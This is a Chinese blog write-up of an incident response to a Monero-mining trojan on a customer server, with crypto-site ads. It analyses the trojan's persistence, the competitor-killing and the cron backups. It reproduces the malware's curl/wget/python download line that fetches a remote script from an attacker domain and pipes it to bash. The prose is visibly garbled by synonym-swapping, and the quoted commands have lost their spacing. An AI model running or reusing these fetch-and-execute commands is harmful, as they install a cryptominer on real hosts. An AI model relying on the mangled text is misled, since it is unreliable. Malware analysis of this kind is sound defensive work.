WB3交流加微信:WX-93588,⬅️此处为全站广告位,与正文项目无关
注册并登录App即可领取高达 60,000 元的数字货币盲盒:点击此处注册OKX
0x00概述
本文主要是记录了一次针对挖矿程序的应急响应处理,从三个部分来解读此次事情:
事情描述部分,承认是否有挖矿程序。
现场剖析部分,讲了是怎么一步一步杀掉挖矿程序。
程序剖析部分,针对挖矿脚本的详细解读。杀死竞赛挖矿程序、进程看护、传达挖矿。
0x01疑问的用户
前几天接到客户反映,他们有一台服务器资产存在异常现象,本来装备的crontab守时使命全被修正,用户8220miner组织、miner木马病毒、xms、沦陷下载的标签。
与客户承认该守时使命是可疑的之后,又用top检查了系统资源,发现了一个程序名称为“dbused”的可疑进程,长期的cpu资源占用达到了100以上。
利用可疑的进程PID,从/proc/[PID]目录下的exe文件定位到源文件来自于/tmp目录下的dbused。
将可疑文件扔到VT进行检测,发现极可能与“CoinMiner”挖矿木马相关。
看来这次进犯八九不离十便是挖矿木马相关的进犯了,守时程序应该便是用来下载挖矿程序的,只要先把守时程序删去,再删去歹意程序就行了,所以一一删去之,应该就能够交代了。
主意很夸姣,现实却很残暴。几秒后,发现歹意进程和守时使命悉数恢复了,一朝回到解放前,看来是把问题想得太简单了。
0x03研究员的反击
研究员开始痛定思痛,其实在第一次剖析的时候还忽略了几个关键的头绪:
用户反映crontab会被自动改写(说明存在保持进程)
未检查系统可疑进程
未剖析下载的内容
所以乎,ps-ef检查系统进程,发现存在五个以上的歹意下载进程,和之前发现的守时使命一模一样,确实存在多个保持进程。
curl-fsSLhttp://a.oracleservice.top/xms||wget-q-O-http://a.oracleservice.top/xms||python-c”importurllib2asfbi;printfbi.urlopen(“http://a.oracleservice.top/xms”).read”)|bash-sh;lwp-downloadhttp://a.oracleservice.top/xms/xms;bash/xms;/xms;rm-rf/xms
突破口都指向下载的可疑文件,下载进行剖析,剖析发现是一个结合资源准备、同类竞赛、进程保持、横向扩散、痕迹铲除的脚本。
Step1:最大化这个进程的使用资源
1.脚本先将系统的selinux防火墙设置为封闭。
2.脚本将用户最大可用的进程数调整到5万,便于最大化占用主机资源。
3.修正内存参数,意图也是最大化占用主机资源。
Step2:删去竞赛进程
这儿意图是为了封闭一些进程,这儿的封闭进程的行为,意图是为了杀掉其他的一些挖矿进程,只允许自己的程序挖矿。
检查列出杀死的连接IP情报,基本都是与挖矿或木马相关。
Step3:删去文件的特别属性使得文件能够被修正操作
chattr指令mod解释
i:即Immutable,系统不允许对这个文件进行任何的修正。假如目录具有这个属性,那么任何的进程只能修正目录之下的文件,不允许树立和删去文件。
a:即AppendOnly,系统只允许在这个文件之后追加数据,不允许任何进程掩盖或截断这个文件。假如目录具有这个属性,系统将只允许在这个目录下树立和修正文件,而不允许删去任何文件。
最后将守时使命,进行了相似确认操作。
Step4:保证连通性
先解除/tmp/dbused目录下面的确认。
确认本机ip地址的范围(16位掩码)。
保证主机能与歹意负载域名pool.supportxmr.com、a.oracleservice.top连通。
Step5:创建守时使命
一共创建了5个cron保持进程。
/etc/cron.d/root
/etc/cron.d/apache
/etc/cron.d/nginx
/var/spool/cron/crontabs
/etc/cron.hourly/oanacroner1
Step6:保持进程1
即保证dbused这个文件能正常运转。写了几个备用的函数,judge函数便是,假如dbused文件正常运转了,那么就会存在三个连接,假如没有正常运转,那么就从头运转一下dbused文件。
Step7:保持进程2
cronbackup函数为了保证守时使命的正常运转,一旦其间一个守时使命被删去,就会履行另一个守时使命。
cronbackup{
pay=”(curl-fsSL$url/xms||wget-q-O-$url/xms||python-c”importurllib2asfbi;printfbi.urlopen(\”$url/xms\”).read”)|bash
此时快讯
【CryptoQuant研究主管:交易所USDT储备增至历史高点】7月4日消息,CryptoQuant研究主管Julio Moreno发推称,数据显示,交易所的USDT储备增加到有史以来的最高水平(ERC20代币)。加密市场上最大稳定币的流动性持续增加。
转载请注明:挖矿木马:一场较量 | 币百度